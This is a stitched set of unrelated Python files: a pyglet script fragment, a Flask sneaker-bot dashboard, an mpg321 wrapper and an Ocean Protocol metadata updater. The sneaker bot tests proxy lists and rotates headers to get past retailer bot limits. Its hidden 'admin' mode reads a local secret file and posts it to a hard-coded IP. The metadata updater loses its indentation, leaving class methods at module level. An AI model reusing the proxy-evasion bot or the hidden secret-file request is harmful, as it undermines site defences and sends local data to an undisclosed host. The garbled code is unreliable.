                gui.selectnear(x,y)

        @win.event
        def on_resize(width, height):
            gui.resize(width, height)

        pyglet.app.run()
    finally:
        print("Cleaning up...")
        # NOTE(review): `running` is never read in visible code — confirm the
        # worker thread is meant to poll it.
        running = False
        if not SINGLE_THREAD:
            t.join()
        world.cleanup()
|
app.py | #import versionCheck
#^This fixes a really common problem I'm getting messages about. It checks for
#python 2.x
from flask import Flask, render_template, request, url_for, redirect, Markup, jsonify, make_response, send_from_directory, session
import requests
import sys
import bs4
import RandomHeaders
import re
import urllib
import threading
import time
import main
import csv
from time import gmtime, strftime
app = Flask(__name__, static_url_path='/static')
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
# Module-level state shared by the request handlers below.
PROXIES = []
sessionInfo = {}
bot = main.bot([])
# bot is initiated with a LIST of STRINGS for proxies... not dicts
# No caching at all for API endpoints.
@app.after_request
def add_header(r):
    """
    Disable client/proxy caching on every response.

    BUG FIX: the old code first set "no-cache, no-store, must-revalidate"
    and then immediately overwrote Cache-Control with "public, max-age=0",
    silently re-enabling shared caching.  Set the header once instead.
    """
    r.headers["Cache-Control"] = "no-cache, no-store, must-revalidate, max-age=0"
    r.headers["Pragma"] = "no-cache"
    r.headers["Expires"] = "0"
    return r
def configure_proxy_settings(ip, port, username=None, password=None):
    """
    Build a requests-style proxy mapping.

    :param ip: proxy IP address, e.g. 127.0.0.1
    :param port: proxy port number
    :param username: optional auth user; only used together with `password`
    :param password: optional auth password; only used together with `username`
    :return: dict with 'http'/'https' proxy URLs, or None when ip/port missing
             (the machine's default proxy settings are then used)
    """
    # Guard clause: without both an IP and a port there is nothing to build.
    if ip is None or port is None:
        return None
    credentials = ''
    if username is not None and password is not None:
        credentials = '{}:{}@'.format(username, password)
    return {
        'http': 'http://{credentials}{ip}:{port}'.format(credentials=credentials, ip=ip, port=port),
        'https': 'https://{credentials}{ip}:{port}'.format(credentials=credentials, ip=ip, port=port),
    }
def getPing(url, ip, port, timeout=8):
    """Time a GET of *url* through proxy ip:port.

    Returns the elapsed seconds as a string with 5 decimal places; raises on
    connection failure/timeout (callers catch and mark the proxy failed).
    """
    # BUG FIX: the configured proxy dict was built and then ignored — a raw
    # "ip:port" string was passed as `proxies=`, which requests cannot use.
    proxies = configure_proxy_settings(ip, port)
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.9'
    }
    start = time.time()
    nf = requests.get(url, proxies=proxies, headers=headers, timeout=timeout)
    # Touch the body so the timing covers the full download.
    page = nf.content
    nf.close()
    end = time.time()
    return format((end - start), '.5f')
def returnTime():
    """Current UTC wall-clock time formatted as ``HH:MM:SS``.

    Note: intentionally GMT, not adjusted to the local timezone.
    """
    now = gmtime()
    return strftime("%H:%M:%S", now)
def massTestProxies(listOfProxies):
    """Ping-test every "ip:port" proxy string in parallel.

    Returns a list of dicts with IP/Port/Ping/ConnectTime for each proxy that
    responded; failed proxies are logged and omitted.
    """
    RESPONSE = []

    def addToList(proxy):
        # Thread target: test one proxy and append its stats.
        # list.append is atomic under the GIL, so no lock is needed.
        try:
            print("testing proxy: {}".format(proxy))
            proxyInfo = {}
            ip = proxy.partition(":")[0]
            port = proxy.partition(':')[2]
            proxyInfo['IP'] = ip
            proxyInfo['Port'] = port
            proxyInfo['Ping'] = getPing('https://whatismyipaddress.com/', ip=ip, port=port)
            proxyInfo['ConnectTime'] = returnTime()
            RESPONSE.append(proxyInfo)
            print("done: {}".format(proxy))
        except Exception as exp:
            print(exp)
            print("proxy: {} failed".format(proxy))
            return

    # (Removed an unused `url = 'http://www.adidas.com/'` left over from an
    # earlier version — the ping target is hard-coded in the getPing call.)
    threads = [threading.Thread(target=addToList, args=(proxy,)) for proxy in listOfProxies]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return RESPONSE
def returnProxies(csvpath):
    """Read a CSV file of proxies and return its rows as lists of strings."""
    # BUG FIX: the file was opened in 'rb'; Python 3's csv.reader requires a
    # text-mode file and raises on bytes.  newline='' is the csv-documented
    # way to open the file.
    with open(csvpath, 'r', newline='') as f:
        reader = csv.reader(f)
        return list(reader)
def getCommits():
    """Scrape the project's GitHub page for the commit count and last update.

    Retries up to 5 times; returns [lastUpdate, updateCount] on success or
    the string "ERROR" when every attempt fails.  NOTE(review): parsing raw
    markup with partition() is brittle against GitHub layout changes.
    """
    for i in range(5):
        try:
            url = 'https://github.com/theriley106/SneakerBotTutorials'
            res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'})
            page = bs4.BeautifulSoup(res.text, 'lxml')
            # Commit count sits in <span class="num text-emphasized">.
            updateCount = str(page).partition('<span class="num text-emphasized">')[2].partition("<")[0].strip()
            lastUpdate = page.select('relative-time')[0].getText()
            # Sanity check: a real count is at least 3 characters here.
            if len(updateCount) > 2:
                return [lastUpdate, updateCount]
        except Exception as exp:
            print(exp)
    return "ERROR"
@app.route('/changeHeader', methods=['POST'])
def headerChange():
    """POST handler: set the bot's User-Agent from the first form value."""
    # The form is expected to contain a single field whose value is the header.
    bot.updateHeader(str(list(request.form.items())[0][1]))
    return redirect(url_for('useBot'))
# perhaps it would be better to have default variables set for index, and this will edit default variables?
# ie: index(headers=None, url=None, etc)
@app.route('/goToURL', methods=['POST'])
def goToURL():
    """POST handler: send every bot driver to the URL from the first form value."""
    bot.sendAllToURL(url=str(list(request.form.items())[0][1]))
    return redirect(url_for('useBot'))
@app.route('/openDriver', methods=['POST'])
def driverAdd():
    """POST handler: start all webdrivers.

    BUG FIX: a Flask view must return a response; the old handler returned
    None, which makes Flask raise a 500.  Redirect to the bot page like the
    other POST handlers do.
    """
    bot.startAllDrivers()
    return redirect(url_for('useBot'))
@app.route('/', methods=['GET'])
def index():
    """Landing page: refresh GitHub stats, ping-test proxies, start drivers."""
    gitCommits = getCommits()
    print(gitCommits)
    # NOTE(review): getCommits() returns the string "ERROR" on failure, in
    # which case these indexes yield single characters — confirm handling.
    sessionInfo['lastUpdate'] = gitCommits[0]
    sessionInfo['gitCommits'] = gitCommits[1]
    sessionInfo['info'] = massTestProxies(PROXIES)
    print("Done mass test")
    bot.startAllDrivers()
    return redirect(url_for('useBot'))
@app.route('/botInfo', methods=['GET'])
def useBot():
    """Render the main dashboard from the current session and bot state."""
    # IPs only — strip the port from every working "ip:port" proxy string.
    proxyLists = [proxy.partition(':')[0] for proxy in bot.successProxies]
    return render_template("index.html", gitCommits=sessionInfo['gitCommits'], lastUpdate=sessionInfo['lastUpdate'], URL=bot.targetURL, proxyInfo=sessionInfo['info'], driverInfo=bot.returnDriverInfo(), proxyDiff=len(bot.failedProxies), allProxies=proxyLists)
@app.route('/test', methods=['GET'])
def testTemplate():
    """Render the dashboard with canned dummy data for template debugging."""
    return render_template("index.html", gitCommits=100, lastUpdate='Dec 3', proxyInfo=[{"IP": '41', "Port": '41', "Ping": '132', "ConnectTime": '321'}], driverInfo=[{'proxy': 'proxy', 'driver': 'driver', 'url': 'url', 'useragent': 'self.headers'}], proxyDiff=4)
if __name__ == '__main__':
    # Proxies come either from a CSV file or as "ip:port" CLI arguments.
    if len(sys.argv) > 1:
        if '.csv' in str(sys.argv[1]):
            PROXIES = returnProxies(sys.argv[1])
        if len(sys.argv) > 1 and '.csv' not in str(sys.argv[1]):
            for proxy in sys.argv[1:]:
                PROXIES.append(proxy)
        for proxy in PROXIES:
            bot.addProxy(proxy)
            print("Initiating Bot with Proxy: {}".format(proxy))
    else:
        print("It looks like you didn't input any Proxies.")
        if input("It is HIGHLY recommended that you use proxies. Continue without? [Y/N] ").lower() == 'n':
            raise Exception("Input Proxies...")
    # Hidden "admin" mode: pull a fresh proxy list from a private endpoint.
    if 'admin' in str(sys.argv).lower():
        r = requests.post("http://138.197.123.15:8888/proxies/{}".format(open('../../SecretCode.txt').read().strip())).json()
        PROXIES = r["proxies"][-10:]
    try:
        bot = main.bot(PROXIES)
    except:
        # NOTE(review): bare except hides the real failure; the assumption is
        # that bot construction only fails when PhantomJS is missing — confirm.
        if input("You need to install PhantomJS to use this program. Continue without? [Y/N ").lower() == 'n':
            raise Exception("Install PhantomJS...")
    app.run(host='127.0.0.1', port=8000)
mpyg321.py | import pexpect
from threading import Thread
# Status lines mpg321/mpg123 emit in remote-control (-R) mode, mapped to the
# player action they represent.
mpg_outs = [
    {
        "mpg_code": "@P 0",
        "action": "user_stop",
        "description": "Music has been stopped by the user."
    },
    {
        "mpg_code": "@P 1",
        "action": "user_pause",
        "description": "Music has been paused by the user."
    },
    {
        "mpg_code": "@P 2",
        "action": "user_resume",
        "description": "Music has been resumed by the user."
    },
    {
        "mpg_code": "@P 3",
        "action": "end_of_song",
        "description": "Player has reached the end of the song."
    },
    {
        "mpg_code": "@E *",
        "action": "error",
        "description": "Player has encountered an error."
    }
]

# Patterns handed to pexpect.expect(), in the same order as mpg_outs.
mpg_codes = [v["mpg_code"] for v in mpg_outs]

# Error-message substrings mapped to the error category raised for them.
# BUG FIX: a comma was missing between the "No track loaded!" and
# "Error opening stream" entries, which made this module a SyntaxError.
mpg_errors = [
    {
        "message": "empty list name",
        "action": "generic_error"
    },
    {
        "message": "No track loaded!",
        "action": "generic_error"
    },
    {
        "message": "Error opening stream",
        "action": "file_error"
    },
    {
        "message": "failed to parse given eq file:",
        "action": "file_error"
    },
    {
        "message": "Corrupted file:",
        "action": "file_error"
    },
    {
        "message": "Unknown command:",
        "action": "command_error"
    },
    {
        "message": "Unfinished command:",
        "action": "command_error"
    },
    {
        "message": "Unknown command or no arguments:",
        "action": "argument_error"
    },
    {
        "message": "invalid arguments for",
        "action": "argument_error"
    },
    {
        "message": "Missing argument to",
        "action": "argument_error"
    },
    {
        "message": "failed to set eq:",
        "action": "eq_error"
    },
    {
        "message": "Error while seeking",
        "action": "seek_error"
    },
]
# # # Errors # # #
class MPyg321PlayerError(RuntimeError):
    """Base class for any errors encountered by the player during runtime."""


class MPyg321PlayerFileError(MPyg321PlayerError):
    """Raised for file-related player errors (open/parse/corruption)."""


class MPyg321PlayerCommandError(MPyg321PlayerError):
    """Raised when the player rejects a remote-control command."""


class MPyg321PlayerArgumentError(MPyg321PlayerError):
    """Raised for missing or invalid command arguments."""


class MPyg321PlayerEQError(MPyg321PlayerError):
    """Raised for equalizer-related errors."""


class MPyg321PlayerSeekError(MPyg321PlayerError):
    """Raised when seeking within a track fails."""
class PlayerStatus:
    """Integer state constants for MPyg321Player.status.

    Note: "INSTANCIATED" keeps its historical misspelling — renaming the
    attribute would break existing callers.
    """
    INSTANCIATED = 0  # player built, no song loaded yet
    PLAYING = 1
    PAUSED = 2
    STOPPED = 3
    QUITTED = 4
class MPyg321Player:
    """Main class for mpg321 player management.

    Spawns an mpg321 (or mpg123) subprocess in remote-control mode and parses
    its output on a daemon thread, dispatching events to the on_* callbacks.
    """
    player = None
    status = None
    output_processor = None

    def __init__(self):
        """Spawn the player process and start the output-processing thread.

        Raises FileNotFoundError when neither mpg321 nor mpg123 is installed.
        """
        # BUG FIX: pexpect has no `actions` module — the spawn failure type
        # lives in pexpect.exceptions.
        try:
            self.player = pexpect.spawn("mpg321 -R somerandomword",
                                        timeout=None)
        except pexpect.exceptions.ExceptionPexpect:
            try:
                self.player = pexpect.spawn("mpg123 -R somerandomword",
                                            timeout=None)
            except pexpect.exceptions.ExceptionPexpect:
                raise FileNotFoundError("""\
No suitable command found. Please install mpg321 or mpg123 and try again.""")
        self.status = PlayerStatus.INSTANCIATED
        self.output_processor = Thread(target=self.process_output)
        self.output_processor.daemon = True
        self.output_processor.start()

    def process_output(self):
        """Parse player output forever, dispatching to the callbacks."""
        while True:
            index = self.player.expect(mpg_codes)
            action = mpg_outs[index]["action"]
            if action == "user_stop":
                self.on_any_stop()
                self.on_user_stop()
            if action == "user_pause":
                self.on_any_stop()
                self.on_user_pause()
            if action == "user_resume":
                self.on_user_resume()
            if action == "end_of_song":
                self.on_any_stop()
                self.on_music_end()
            if action == "error":
                self.process_errors()

    def play_song(self, path):
        """Load and immediately start playing the file at *path*."""
        self.player.sendline("LOAD " + path)
        self.status = PlayerStatus.PLAYING

    def pause(self):
        """Pause playback (no-op unless currently playing)."""
        if self.status == PlayerStatus.PLAYING:
            # mpg321's PAUSE command toggles pause/resume.
            self.player.sendline("PAUSE")
            self.status = PlayerStatus.PAUSED

    def resume(self):
        """Resume playback (no-op unless currently paused)."""
        if self.status == PlayerStatus.PAUSED:
            # PAUSE toggles: sending it while paused resumes playback.
            self.player.sendline("PAUSE")
            self.status = PlayerStatus.PLAYING

    def stop(self):
        """Stop playback."""
        self.player.sendline("STOP")
        self.status = PlayerStatus.STOPPED

    def quit(self):
        """Terminate the player process."""
        self.player.sendline("QUIT")
        self.status = PlayerStatus.QUITTED

    def jump(self, pos):
        """Jump to frame position *pos* in the current track."""
        self.player.sendline("JUMP " + str(pos))

    def process_errors(self):
        """Read the player's error line and raise the matching exception."""
        output = self.player.readline().decode("utf-8")
        # BUG FIX: the old loop referenced an undefined name `error` instead
        # of the loop variable `mpg_error`, raising NameError on any error.
        for mpg_error in mpg_errors:
            if mpg_error["message"] in output:
                action = mpg_error["action"]
                if action == "generic_error":
                    raise MPyg321PlayerError(output)
                if action == "file_error":
                    raise MPyg321PlayerFileError(output)
                if action == "command_error":
                    raise MPyg321PlayerCommandError(output)
                if action == "argument_error":
                    raise MPyg321PlayerArgumentError(output)
                if action == "eq_error":
                    raise MPyg321PlayerEQError(output)
                if action == "seek_error":
                    raise MPyg321PlayerSeekError(output)
        # Some other error occurred
        raise MPyg321PlayerError(output)

    # # # Callbacks # # #
    def on_any_stop(self):
        """Callback when the music stops for any reason"""
        pass

    def on_user_pause(self):
        """Callback when user pauses the music"""
        pass

    def on_user_resume(self):
        """Callback when user resumes the music"""
        pass

    def on_user_stop(self):
        """Callback when user stops music"""
        pass

    def on_music_end(self):
        """Callback when music ends"""
        pass
|
metadata_updater.py | import logging
import os
import time
from threading import Thread
import elasticsearch
from eth_utils import add_0x_prefix
from eth_utils import remove_0x_prefix
from ocean_lib.models.bfactory import BFactory
from ocean_lib.models.bpool import BPool
from ocean_lib.models.fixed_rate_exchange import FixedRateExchange
from ocean_lib.ocean.util import from_base_18, to_base_18
from ocean_lib.web3_internal.event_filter import EventFilter
from web3.utils.events import get_event_data
from aquarius.app.dao import Dao
from aquarius.events.util import (
prepare_contracts,
get_datatoken_info,
get_exchange_contract,
)
logger = logging.getLogger(__name__)
class MetadataUpdater:
"""Update price/liquidity info of all known assets.
The update happens in two stages:
1. Initial update is performed if this is ran for the first time. This is determined by
checking for a cached block number from a previous run. The initial update extracts all
Datatoken<>Ocean balancer pools by looking at the BFactory `BPoolRegistered` event. Then
each Asset in the database is updated with the liquidity/price information from the
corresponding pool.
2. Periodic update is continuously running to detect liquidity updates by looking at the
`LOG_JOIN`, `LOG_EXIT`, and `LOG_SWAP` event logs. The events are detected regardless of
the pool contract, i.e. it looks at all matching events from all BPool contracts or
even any smartcontract event that has the same signature.
See `get_dt_addresses_from_pool_logs`
Notes:
- Set the `BFACTORY_BLOCK` envvar to tell the updater which `fromBlock` to start processing
events. This should be set to the blockNumber in which the BFactory was created/deployed
- The continuous updater runs every N seconds (initially set to 20s)
- The price/liquidity info is added to the Asset's json object under the `price` key, e.g.:
asset['price'] = {
'datatoken': 90,
'ocean': 10,
'value': 0.111,
'type': 'pool',
'address': '0x12112112112...',
'pools': ['0x12112112112...', ]
}
"""
DID_PREFIX = "did:op:"
PRICE_TOO_LARGE = 1000000000
def __init__(self, oceandb, other_db_index, web3, config):
self._oceandb = oceandb
self._other_db_index = other_db_index
self._web3 = web3
self._config = config
self._addresses = prepare_contracts(self._web3, self._config)
self._checksum_ocean = self._addresses.get("Ocean")
if not self._checksum_ocean:
self._checksum_ocean = os.getenv("OCEAN_ADDRESS")
logger.debug(
f"Ocean token address: {self._checksum_ocean}, \n"
f"all deployed addresses: {self._addresses.items()}"
)
assert self._checksum_ocean, (
f"Ocean token address is not found: addresses={self._addresses.keys()}.\n"
f'Please add the "Ocean" token address in the address.json file or set the '
f"`OCEAN_ADDRESS` environment variable."
)
self._OCEAN = self._checksum_ocean.lower()
self.ex_contract = FixedRateExchange(get_exchange_contract(self._web3).address)
assert (
self.ex_contract and self.ex_contract.address
), "Failed to load FixedRateExchange contract."
self.bfactory_block = int(os.getenv("BFACTORY_BLOCK", 0))
self._do_first_update = bool(int(os.getenv("METADATA_UPDATE_ALL", 1)) == 1)
try:
self.get_last_processed_block()
# self._do_first_update = False
except Exception:
self.store_last_processed_block(self.bfactory_block)
self._is_on = False
default_quiet_time = 10
try:
self._quiet_time = os.getenv("OCN_METADATA_UPDATER_QUITE_TIME", 0)
except ValueError:
self._quiet_time = 0
self._quiet_time = max(self._quiet_time, default_quiet_time)
    @property
    def is_running(self):
        """Whether the background update loop is (or should be) running."""
        return self._is_on
    def start(self):
        """Spawn the daemon update thread; no-op if already running or if the
        web3/OceanDB dependencies are missing."""
        if self._is_on:
            return
        if not self._web3:
            logger.error("Cannot start MetadataUpdater without a web3 instance.")
            return
        if self._oceandb is None:
            logger.error("Cannot start MetadataUpdater without an OceanDB instance.")
            return
        logger.info("Starting the MetadataUpdater.")
        t = Thread(target=self.run, daemon=True)
        # Flag is set before start() so run() sees _is_on immediately.
        self._is_on = True
        t.start()
    def is_first_update_enabled(self):
        """True when a full initial refresh should run (METADATA_UPDATE_ALL)."""
        return self._do_first_update
    def stop(self):
        """Signal the update loop to exit on its next iteration."""
        self._is_on = False
def run(self):
if self._do_first_update:
self.do_update()
while True:
try:
if not self._is_on:
return
self.process_pool_events()
except (KeyError, Exception) as e:
logger.error("Error doing update of Metadata.")
logger.error(e)
raise
time.sleep(self._quiet_time)
def _get_all_assets(self):
    """Yield every asset document stored in OceanDB.

    An exception raised at the yield point (e.g. thrown into the
    generator by a consumer) is logged and iteration continues.
    """
    for asset in self._oceandb.list():
        try:
            yield asset
        except Exception as e:
            # `(KeyError, Exception)` collapsed — KeyError is an Exception.
            # Also use the module `logger` like the rest of this class
            # instead of the root `logging` module.
            logger.error(str(e))
def _get_event_signature(self, contract, event_name):
    """Return the keccak topic hash (hex string) of a contract event.

    Builds the canonical signature ``Name(type1,type2,...)`` from the
    event ABI inputs and hashes it — the value used as ``topics[0]``
    when filtering logs.

    Raises:
        ValueError: if the contract exposes no event named `event_name`.
    """
    e = getattr(contract.events, event_name)
    if not e:
        raise ValueError(
            f"Event {event_name} not found in {contract.CONTRACT_NAME} contract."
        )
    abi = e().abi
    types = [param["type"] for param in abi["inputs"]]
    sig_str = f'{event_name}({",".join(types)})'
    return self._web3.sha3(text=sig_str).hex()
def get_last_processed_block(self):
    """Read the last processed block number from the bookkeeping ES index.

    Raises if the checkpoint record does not exist yet; callers treat
    that as "first run".
    """
    last_block_record = self._oceandb.driver.es.get(
        index=self._other_db_index, id="pool_events_last_block", doc_type="_doc"
    )["_source"]
    return last_block_record["last_block"]
def store_last_processed_block(self, block):
    """Persist `block` as the last-processed-block checkpoint in ES.

    Best-effort: a rejected request is logged, not raised.
    """
    record = {"last_block": block}
    try:
        # The trailing `["_id"]` subscript on the result was dead code
        # (the value was discarded) and has been removed.
        self._oceandb.driver.es.index(
            index=self._other_db_index,
            id="pool_events_last_block",
            body=record,
            doc_type="_doc",
            refresh="wait_for",
        )
    except elasticsearch.exceptions.RequestError as e:
        logger.error(
            f"store_last_processed_block: block={block} type={type(block)}, error={e}"
        )
def get_dt_addresses_from_exchange_logs(self, from_block, to_block=None):
    """Scan FixedRateExchange logs for newly created exchanges.

    Returns a list of (datatoken_address, exchangeId) tuples extracted
    from `ExchangeCreated` events in [from_block, to_block].
    """
    contract = FixedRateExchange(None)
    event_names = ["ExchangeCreated"]  # , 'ExchangeRateChanged']
    topic0_list = [self._get_event_signature(contract, en) for en in event_names]
    # per event: names of the args that carry a datatoken address
    args_list = [("dataToken",)]
    filters = []
    to_block = to_block or "latest"
    for i, event_name in enumerate(event_names):
        filters.append(
            {
                "fromBlock": from_block,
                "toBlock": to_block,
                "topics": [topic0_list[i]],
            }
        )
    events = [getattr(contract.events, en) for en in event_names]
    event_abis = [e().abi for e in events]
    address_exid = []
    for i, _filter in enumerate(filters):
        try:
            logs = self._web3.eth.getLogs(_filter)
        except ValueError as e:
            # best-effort: log the failed filter and continue with nothing
            logger.error(
                f"get_dt_addresses_from_exchange_logs -> web3.eth.getLogs (filter={_filter}) failed: "
                f"{e}.."
            )
            logs = []
        if logs:
            args = args_list[i]
            for log in logs:
                parsed_log = get_event_data(event_abis[i], log)
                address_exid.extend(
                    [
                        (
                            parsed_log.args.get(arg, ""),
                            add_0x_prefix(parsed_log.args.exchangeId.hex()),
                        )
                        for arg in args
                    ]
                )
        # all_logs.append(parsed_log)
    return address_exid
def get_dt_addresses_from_pool_logs(self, from_block, to_block=None):
    """Scan BPool logs for datatokens touched by join/exit/swap events.

    Returns (token_address, pool_address) tuples; the token address is
    blanked ("") when it is the Ocean token itself, keeping the pool.
    """
    contract = BPool(None)
    event_names = ["LOG_JOIN", "LOG_EXIT", "LOG_SWAP"]
    topic0_list = [self._get_event_signature(contract, en) for en in event_names]
    # per event: which args may carry a (data)token address
    args_list = [("tokenIn",), ("tokenOut",), ("tokenIn", "tokenOut")]
    filters = []
    to_block = to_block or "latest"
    for i, event_name in enumerate(event_names):
        filters.append(
            {
                "fromBlock": from_block,
                "toBlock": to_block,
                "topics": [topic0_list[i]],
            }
        )
    events = [getattr(contract.events, en) for en in event_names]
    event_abis = [e().abi for e in events]
    # all_logs = []
    addresses = []
    for i, _filter in enumerate(filters):
        try:
            logs = self._web3.eth.getLogs(_filter)
        except ValueError as e:
            logger.error(
                f"get_dt_addresses_from_pool_logs -> web3.eth.getLogs "
                f"(filter={_filter}) failed: {e}.."
            )
            logs = []
        if logs:
            args = args_list[i]
            for log in logs:
                parsed_log = get_event_data(event_abis[i], log)
                addresses.extend(
                    [
                        (parsed_log.args.get(arg, ""), parsed_log.address)
                        for arg in args
                    ]
                )
        # all_logs.append(parsed_log)
    # blank out the Ocean token address, but keep the pool entry
    addresses_and_pools = [
        (a, pool) if a and a.lower() != self._OCEAN else ("", pool)
        for (a, pool) in addresses
    ]
    return addresses_and_pools
def get_datatoken_pools(self, dt_address, from_block=0, to_block="latest"):
    """Return pools that ever had liquidity added for `dt_address`.

    Filters LOG_JOIN events whose indexed tokenIn topic equals the
    datatoken address; returns None when no such event exists.
    """
    contract = BPool(None)
    topic0 = self._get_event_signature(contract, "LOG_JOIN")
    # topics[2] is the indexed tokenIn argument, left-padded to 32 bytes
    topic2 = f"0x000000000000000000000000{remove_0x_prefix(dt_address).lower()}"
    filter_params = {
        "fromBlock": from_block,
        "toBlock": to_block,
        "topics": [topic0, None, topic2],
    }
    e = getattr(contract.events, "LOG_JOIN")
    event_abi = e().abi
    logs = self._web3.eth.getLogs(filter_params)
    if not logs:
        return None
    # de-duplicate pool addresses across events
    pools = {get_event_data(event_abi, log).address for log in logs}
    return list(pools)
def _get_liquidity_and_price(self, pools, dt_address):
    """Pick the best-priced OCEAN/datatoken pool among `pools`.

    Returns (dt_reserve, ocn_reserve, price, pool_address). When no pool
    holds both tokens with a sane price, returns zeros with pools[0].
    """
    assert pools, f"pools should not be empty, got {pools}"
    logger.debug(f" Searching {pools} for {dt_address}")
    dt_address_lower = dt_address.lower()
    pool_to_price = dict()
    for _pool in pools:
        try:
            pool = BPool(_pool)
            try:
                ptokens = {a.lower() for a in pool.getCurrentTokens()}
            except Exception:
                # unreadable pool: skip it
                continue
            if self._OCEAN not in ptokens or dt_address_lower not in ptokens:
                logger.debug(
                    f" ignore pool {_pool}, cannot find {self._OCEAN} and {dt_address_lower} in tokens list {ptokens}"
                )
                continue
            price = from_base_18(
                pool.getSpotPrice(self._checksum_ocean, dt_address)
            )
            # discard zero/negative or absurdly large spot prices
            if price <= 0.0 or price > self.PRICE_TOO_LARGE:
                continue
            pool_to_price[_pool] = price
            logger.debug(f" Adding pool {_pool} with price {price}")
        except Exception as e:
            logger.error(
                f"failed to get liquidity/price info from pool {_pool} and datatoken {dt_address}: {e}"
            )
    if pool_to_price:
        # cheapest pool wins; re-read its reserves for the final figures
        _pool = sorted(pool_to_price.items(), key=lambda x: x[1])[0][0]
        dt_reserve, ocn_reserve, price, _pool = self.get_pool_reserves_and_price(
            _pool, dt_address
        )
        return dt_reserve, ocn_reserve, price, _pool
    # no pool or no pool with price was found
    return 0.0, 0.0, 0.0, pools[0]
def get_pool_reserves_and_price(self, _pool, dt_address):
    """Read reserves and the OCEAN cost of 1.0 datatoken from a pool.

    Returns (dt_reserve, ocn_reserve, price, _pool) with amounts
    converted from base-18 units; the price is zeroed for dust reserves
    or out-of-range values.
    """
    pool = BPool(_pool)
    dt_reserve = pool.getBalance(dt_address)
    ocn_reserve = pool.getBalance(self._checksum_ocean)
    # OCEAN amount needed to buy exactly 1.0 datatoken at current weights
    price_base = pool.calcInGivenOut(
        ocn_reserve,
        pool.getDenormalizedWeight(self._checksum_ocean),
        dt_reserve,
        pool.getDenormalizedWeight(dt_address),
        to_base_18(1.0),
        pool.getSwapFee(),
    )
    price = from_base_18(price_base)
    ocn_reserve = from_base_18(ocn_reserve)
    dt_reserve = from_base_18(dt_reserve)
    if dt_reserve <= 1.0:
        # not enough datatoken liquidity to quote a meaningful price
        price = 0.0
    if price > self.PRICE_TOO_LARGE:
        price = 0.0
    return dt_reserve, ocn_reserve, price, _pool
def _get_fixedrateexchange_price(self, dt_address, owner=None, exchange_id=None):
    """Return (price, supply) for a datatoken's fixed-rate exchange.

    The exchange is looked up by `exchange_id`, or derived from
    (OCEAN, dt_address, owner) when only the owner is given. Returns
    (None, None) when the exchange does not exist or reading fails.
    """
    fre = self.ex_contract
    try:
        if not exchange_id:
            assert (
                owner is not None
            ), "owner is required when `exchange_id` is not given."
            exchange_id = add_0x_prefix(
                fre.generateExchangeId(
                    self._checksum_ocean, dt_address, owner
                ).hex()
            )
        ex_data = fre.getExchange(exchange_id)
        # an unset exchangeOwner means the exchange was never created
        if not ex_data or not ex_data.exchangeOwner:
            return None, None
        price = from_base_18(ex_data.fixedRate)
        supply = from_base_18(ex_data.supply)
        return price, supply
    except Exception as e:
        logger.error(
            f"Reading exchange price failed for datatoken {dt_address}, "
            f"owner {owner}, exchangeId {exchange_id}: {e}"
        )
        return None, None
def get_all_pools(self):
    """Return all BPool addresses registered since the BFactory block.

    Scans `BPoolRegistered` events in fixed-size block chunks to stay
    under node query limits; failed chunks are logged and skipped.
    """
    bfactory = BFactory(self._addresses.get(BFactory.CONTRACT_NAME))
    event_name = "BPoolRegistered"
    event = getattr(bfactory.events, event_name)
    latest_block = self._web3.eth.blockNumber
    _from = self.bfactory_block
    chunk = 10000
    pools = []
    while _from < latest_block:
        # chunk ranges are inclusive and contiguous: [_from, _from+chunk-1]
        event_filter = EventFilter(
            event_name, event, None, from_block=_from, to_block=_from + chunk - 1
        )
        try:
            logs = event_filter.get_all_entries(max_tries=10)
            logs = sorted(logs, key=lambda l: l.blockNumber)
            pools.extend([log.args.bpoolAddress for log in logs])
        except ValueError as e:
            logger.error(
                f"get_all_pools BFactory {bfactory.address}, fromBlock {_from}, toBlock{_from+chunk-1}: {e}"
            )
        _from += chunk
    return pools
def _get_price_updates_from_fixed_rate_exchange(
    self, _dt_address, owner=None, exchange_id=None
):
    """Build the `price` dict for an asset from its fixed-rate exchange.

    Looks the exchange up by `exchange_id` when given, otherwise derives
    it from `owner`. Returns a dict suitable for
    ``asset["price"].update(...)``.
    """
    if exchange_id:
        price, dt_supply = self._get_fixedrateexchange_price(
            _dt_address, exchange_id=exchange_id
        )
    else:
        price, dt_supply = self._get_fixedrateexchange_price(
            _dt_address, owner
        )  # noqa
    # NOTE(review): the ternary below selects between two complete
    # messages, so the exchange_id branch drops the address (and carries
    # an "echange_id" typo) — presumably unintended; confirm before
    # relying on these log lines.
    logger.info(
        f"Updating price for asset with address {_dt_address}, with"
        f"owner={owner}"
        if owner
        else f"echange_id={exchange_id}, " f"from FIXED RATE EXCHANGE."
    )
    # consumable only when the exchange holds more than 1 datatoken
    is_consumable = str(bool(dt_supply is not None and dt_supply > 1)).lower()
    price_dict = {
        "datatoken": dt_supply or 0.0,
        "ocean": 0.0,
        "pools": [],
        "value": price or 0.0,
        "isConsumable": is_consumable,
    }
    logger.info(
        f"Setting datatoken={dt_supply or 0.0}, ocean=0.0, pools=[], "
        f"value={price or 0.0}. Found dt_supply={dt_supply}, setting "
        f"isConsumable={is_consumable}. "
    )
    if price is not None:
        # NOTE(review): message text says "empty string" but the code sets
        # the exchange address and type="exchange".
        logger.info(
            "Found price not None, setting "
            f"address={self.ex_contract.address} and type as empty string."
        )
        price_dict.update({"address": self.ex_contract.address, "type": "exchange"})
    else:
        logger.info(
            "Found price=None, setting address and type as empty string."
        )  # noqa
        price_dict.update({"address": "", "type": ""})
    return price_dict
def _get_price_updates_from_liquidity(self, pools, _dt_address):
    """Build the `price` dict for an asset from its balancer pools."""
    dt_reserve, ocn_reserve, price, pool_address = self._get_liquidity_and_price(
        pools, _dt_address
    )
    # consumable only when a strictly positive price was found
    is_consumable = str(bool(price is not None and price > 0.0)).lower()
    logger.info(
        f"Updating price for asset with address {_dt_address}, with"
        f" {len(pools)} pools found from LIQUIDITY AND PRICE."
        f"Setting datatoken={dt_reserve}, ocean={ocn_reserve}, "
